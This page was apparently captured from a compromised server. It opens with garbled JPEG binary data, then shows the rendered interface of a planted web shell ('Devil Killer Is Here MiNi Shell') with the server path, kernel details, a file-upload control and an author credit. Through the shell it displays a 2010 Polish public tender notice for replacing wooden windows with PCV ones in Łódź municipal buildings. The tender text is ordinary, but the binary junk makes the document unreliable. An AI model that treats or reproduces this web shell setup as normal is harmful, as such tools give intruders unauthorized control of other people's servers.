JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100726/198735-N-2010.html

<p class="kh_header"><b>Łódź: Wymiana stolarki okiennej - drewnianej na stolarkę z PCV w zarządzanych nieruchomościach</b><br>
<b>Numer ogłoszenia: 198735 - 2010; data zamieszczenia: 26.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Górna "Wschód" , ul. Lubelska 9/11/8, 93-129 Łódź, woj. łódzkie, tel. 042 6847601, faks 042 6847576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> anwschod.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki okiennej - drewnianej na stolarkę z PCV w zarządzanych nieruchomościach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1/ Przedmiotem zamówienia jest wymiana istniejącej stolarki okiennej - drewnianej     
    (typu: skrzynkowego i zespolonego) na stolarkę z PCV o podziale pionowym i 
    poziomym zgodnym ze stanem istniejącym wraz z parapetami wewnętrznymi i  
    zewnętrznymi w nieruchomościach administrowanych przez Zamawiającego i w  
    lokalach gminnych w budynkach Wspólnot Mieszkaniowych administrowanych 
    przez Zamawiającego o powierzchni:
 a) wymiana okien po skrzynk.   -    103,70 m2,
 b) wymiana okien pozostałych   -    259,06 m2,
 c) wymiana parapetów wew.      -      71,03 mb,
 d) wymiana parapetów zew.       -      91,56 mb,
-  zgodnie z dokumentacją techniczną stanowiącą załączniki do niniejszej Specyfikacji: 
- wykazem stolarki okiennej do wymiany - zał. nr 1,
- szkicami (rysunkami) nowej stolarki - zał. Nr 2,
- specyfikacją techniczną wykonania i odbioru robót związanych z wymianą stolarki 
    okiennej - zał. Nr 3
2/ W ramach przedmiotu zamówienia Wykonawca zobowiązany będzie do wykonania 
     zamówienia zgodnie z dokumentacją techniczną w zakresie::
 a/ dokonania własnych pomiarów kontrolnych istniejącej stolarki okiennej w celu ich uściślenia, przed zleceniem produkcji okien;
 b/ przygotowania stanowiska pracy;
 c) wykucia - demontażu istniejącej stolarki okiennej drewnianej;
 d/ wykucia - demontażu istniejących parapetów wewnętrznych drewnianych oraz zewnętrznych blaszanych;
 e/ wywozu na wysypisko materiałów z rozbiórki;
 f/ dostawy wykonanej stolarki wraz z parapetami do miejsca montażu,
 g/ montażu stolarki okiennej z PCV oszklonej  - zgodnie z uzyskanymi pomiarami z zachowaniem podziału okna zgodnym ze stanem istniejącym oraz określonymi rysunkami stolarki;
wymagania dotyczące stolarki okiennej:
  - typ jednoramowy;
  - profil pięciokomorowy z PCV, o grubości profilu 70 mm, z pełnego surowca w   
     kolorze białym (ramiaki, ościeżnice), grubości ścianek w klasie B (2,5 mm zewn. 
     1,5 mm wewn), - w przypadku ościeżnic montowanych w otworach, których górna 
     krawędź znajduje się w linii sufitu, wskazane jest zastosowanie ościeżnicy z 
     poszerzonym górnym pasem);
  - wzmocnienie ram (ościeżnic oraz  skrzydeł) na całej szerokości i wysokości - ze 
    stali ocynkowanej w kształcie litery U;
  - okucia obwiedniowe z systemem mikrowentylacji;
  - skrzydła okienne rozwieralno-uchylne  i  uchylne - zgodnie z rysunkami;
  - uszczelki czarne lub szare;
  - szyba zespolona, termoizolacyjna, o współczynnku przenikalności cieplnej 
    K~1,0 W/m2*K; 
  - przenikalność cieplna całego okna =1.2-1.5 W/m2*K;
  - przenikalność akustyczna 31-33 dB;
  - skrzydła okienne winny spełniać warunki zachowania szczelności na przenikalność 
    wody oraz prawidłowej infiltracji powietrza;
  - każde okno i drzwi balkonowe w pomieszczeniu winno być wyposażone w 
     nawiewnik ( powyższa zasada obowiązuje także w przypadku gdy w jednym 
     pomieszczeniu montowanych jest więcej niż jedno okno jak rówież drzwi 
     balkonowe);
  - ościeżnica każdego okna winna być wyposażona w profil lub listwę do montażu 
    parapetów zewnętrznych i wewnętrznych;
  - nie dopuszcza sie profili PCV z recyklingu;
  - w celu zapewnienia jednolitego wygladu stolarki, okna powinny posiadać   
    krawędzie i listwy zaokrąglone;
h/ montażu parapetów wewnętrznych wykonanych z PCV, komorowych w kolorze 
    białym (ewentualnie w kolorze marmurku) o grubości min.20 mm  z
    wykończeniami bocznymi - zgodnie z uzyskanymi własnymi pomiarami;
 i/ montażu parapetów zewnętrznych wykonanych z blachy ocynkowanej o 
    grubości 0,6 mm z odpowiednim wyprofilowaniem (wraz z kapinosem) i 
    wykończeniami bocznymi - zgodnie z uzyskanymi własnymi pomiarami;
 j/ obróbki ościeży okiennych, naprawy powstałych uszkodzeń: tynku oraz muru w 
    obrębie otworów, w przypadku otworów okiennych gdzie występuja ościeża z 
     węgarkami - należy wyrównać ościeża przez doklejenie cienkiej warstwy 
     styropianu i wykończyć płytą kartonowo - gipsową; 
 k) likwidacji stanowiska pracy;
3/ W ramach zamówienia Zamawiający będzie wymagał od Wykonawcy:
 a/ okresu gwarancyjnego na wykonane roboty min. 60 miesięcy; 
 b/ wykonywania robót zgodnie z zasadami bezpieczeństwa i higieny pracy 
     określonymi w Rozporządzeniu Ministra Infrastruktury z dnia 06.02.2003 r.
     (Dz.U. nr 47 poz. 401) oraz obowiązujacymi przepisami p.poż;
 c/ odpowiedzialności za całość szkód powstałych na skutek prowadzonych robót,
 d/ zachowania praw osób trzecich, gdyż wszelkie spory z tego wynikająace mogą być 
     rozstrzygane na drodze sądowej w Sądach Powszechnych, 
 e/ stosowania materiałów budowlanych posiadających atest higieniczny stosowalności 
     w budynkach mieszkalnych, certyfikaty, oceny i aprobaty techniczne;
 f/ do oceny i przyjęcia wykonanych robót przedstawienia następujących dokumentów:
- zaświadczenia o jakości zastosowanych materiałów: certyfikaty, 
         oceny zgodności z normami, atesty, aprobaty techniczne;
 g/ prowadzenia robót przy udziale inspektora nadzoru wyznaczonego przez 
     Zamawiającego,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.42.11.00-5, 45.42.11.50-0, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/ W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy: 
a) posiadania wiedzy i doświadczenia;
    Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez 
    wykazanie w zał. Nr 5 do niniejszej SIWZ, wykonanych robót budowlanych w 
    okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres 
    działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem robotom 
    budowlanym  stanowiącym przedmiot zamówienia z podaniem ich wartości, 
    przedmiotu, dat wykonania i odbiorców, oraz z załączeniem dokumentów 
    potwierdzających, że te roboty budowlane - jakościowo zostały wykonane należycie
    w ilości: co najmniej jednej na kwotę (brutto): min. 20.000,00 zł. 
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawców dokumentów i oświadczeń  na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/ W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy:
a) dysponowania potencjałem technicznym; 
    Wykonawcy winni oświadczyć zał. nr 8 do SIWZ, że dysponują potencjałem 
    technicznym gwarantującym terminowe i jakościowo dobre wykonanie robót - 
    zgodnym z wymogami technologicznymi dla prowadzenia robót objętych 
    zamówieniem.  
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawców dokumentów i oświadczeń na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/ W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy:
a) dysponowania osobami zdolnymi do wykonania zamówienia;
    Wykonawcy winni wykazać zał. nr 6 do SIWZ, że dla zapewnienia należytego 
 wykonania robót budowlanych dysponują min. trzema  osobami w zawodach: 
     murarz - tynkarz, montażysta. 
     Wykonawca winien oświadczyć zał. Nr 7 do SIWZ, że Wykonawca lub 
     osoba uczestnicząca w wykonywaniu zamówienia pełniąca na rzecz Wykonawcy 
     obowiązki kierownika robót - usługi nadzoru nad prowadzonymi robotami posiada      
     wymagane uprawnienia budowlane w specjalności: konstrukcyjno - budowlanej 
    (wykonawcze), zgodne z art. 12, 13, i 14 ustawy z dnia 07.07.1994 r.  Prawo 
     Budowlane z późniejszymi zmianami,  
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawców dokumentów i oświadczeń na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/ W zakresie potwierdzenia spełnienia warunku udziału w postępowaniu, określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy:
a) sytuacji ekonomicznej i finansowej
    Wykonawcy winni udokumentować, że posiadają opłaconą polisę ubezpieczeniową 
    lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od 
    odpowiedzialności cywilnej w zakresie prowadzonej działalności  na sumę 
    ubezpieczenia nie mniej niż 100.000,00 zł. W przypadku załączenia ważności 
    dokumentu na okres krótszy od terminu realizacji zamówienia, do oferty należy 
    dołączyć pisemne zobowiązanie o przedłużeniu ważności ubezpieczenia.      
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawcę dokumentów i oświadczeń na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wschod.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łódź - Górna Wschód 93-129 Łódź ul. Lubelska 9/11 pok. 31 w cenie 20,00 zł brutto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2010 godzina 10:00, miejsce: Administracja Nieruchomościami Łódź - Górna Wschód 93-129 Łódź ul. Lubelska 9/11 pok. 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com